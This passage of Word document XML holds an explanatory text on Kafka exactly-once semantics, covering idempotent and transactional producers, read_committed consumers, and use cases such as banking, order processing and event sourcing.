          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka ensures that a message is </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>neither lost nor processed more than once</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It provides a guarantee that each message is </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delivered and processed exactly once</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in both the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer</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consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pipelines, which is essential for ensuring data integrity in certain applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431BAF32"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EOS is particularly critical in systems that require </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strong consistency guarantees</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as financial transactions, order processing, or event sourcing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181CE2B0" w14:textId="77777777" w:rsidR="00092929"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105BA8D">
          <v:rect id="_x0000_i3185" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27314564" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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How Exactly-Once Semantics (EOS) Works in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FE3CC"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s EOS is implemented through a combination of two key features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3612D41D" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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dempotent Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B602F8F" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147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dempotency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that a message is written only once, even if the producer retries due to network failures or timeouts. It prevents the duplication of messages when retrying after an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D3E52" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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Transactional Producer and Consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1C7A34" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147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producers can send messages in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ensuring that either all messages in a transaction are successfully written or none are (atomicity). This ensures that partial writes don't result in inconsistent data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E88C906" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147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sumers are responsible for ensuring that they only process committed messages and avoid duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4094C47F" w14:textId="77777777" w:rsidR="00092929"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3D2942F">
          <v:rect id="_x0000_i3186" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26430365" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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ey Concepts for Achieving Exactly-Once Semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E60990" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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1. Idempotent Producer Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B09CB47"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o enable </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka producers, the following settings need to be configured:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C84746" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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acks=all</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer waits for the acknowledgment from all replicas before considering the message as successfully written. This ensures the message is replicated to all brokers before being marked as successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B631229" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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enable.idempotence=true</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This enables idempotent production, ensuring that Kafka brokers will avoid writing duplicate messages with the same producer and sequence numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BC7E8B" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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roducer’s transactional.id</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When using Kafka transactions, the producer needs to be configured with a transactional.id to allow Kafka to track and commit transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F778E" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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2. Transactional Producer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AA735B"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o achieve </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly-once</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> delivery using Kafka's transaction model, the following steps are necessary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31182BB2" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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acks=all</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the producer waits for acknowledgment from all replicas before considering the write successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07512A01" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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transactional.id</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This configuration enables the producer to manage a transactional ID to track the messages sent within a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC50FC6" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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he producer begins a transaction with </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>beginTransaction()</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, sends messages, and finally commits the transaction with </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>commitTransaction()</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. If an error occurs, the producer can abort the transaction using </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abortTransaction()</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FB0D99" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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3. Consumer Configuration for EOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B458B4A"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For consumers to read committed messages (ensuring that messages are processed exactly once), the following configuration is crucial:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD4E27" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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solation.level=read_committed</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that consumers only see messages that have been successfully committed. This prevents consumers from reading messages that are part of a transaction but not yet committed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC17D0"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By setting the isolation.level to read_committed, the consumer will only receive messages that have been fully committed, preventing it from processing uncommitted or incomplete messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721A8B1C" w14:textId="77777777" w:rsidR="00092929"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08B8434">
          <v:rect id="_x0000_i3187" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F579772" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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Scenarios Where Exactly-Once Semantics Is Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E59EE5E" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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Financial Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A7307" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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In financial applications, such as banking, each transaction needs to be processed </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly once</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Duplicating a transaction (e.g., double-spending) or missing a transaction can result in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>serious financial discrepancies</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB9615" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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EOS ensures that a bank’s transaction history is accurate, and no transaction is either duplicated or lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3779627F" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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Order Processing Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C464D3" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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E-commerce platforms need to guarantee that an order is processed exactly once. </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Duplicate orders</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can lead to inventory issues, customer dissatisfaction, or financial discrepancies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775CCAEA" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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lastRenderedPageBreak/>
        <w:t>EOS ensures that orders are not accidentally duplicated, especially when there are retries due to network failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE17229" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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Event Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE5722E" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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In </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., CQRS - Command Query Responsibility Segregation), events must be processed exactly once to maintain consistent system states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5959F5AC" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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A duplicate event could lead to incorrect system state or business logic errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B32B2B4" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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ata Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FEA0D3" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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n real-time analytics or data processing pipelines, duplicate data can distort analysis, leading to incorrect conclusions and reports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6C74D3" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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EOS guarantees that data is processed exactly once, making the system’s output reliable and consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CAA901" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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istributed Systems with Multiple Microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC269D8" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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In microservice architectures, different services often rely on Kafka to communicate. Ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly-once</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> delivery and processing is critical to avoid errors like processing the same event multiple times (e.g., order creation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2663858C" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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ithout EOS, errors like double payments or order duplications can occur when retrying events due to network issues or service failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53070BEC" w14:textId="77777777" w:rsidR="00092929"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35B6A0C">
          <v:rect id="_x0000_i3188" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50614230" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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Steps to Achieve Exactly-Once Semantics in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E350307" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
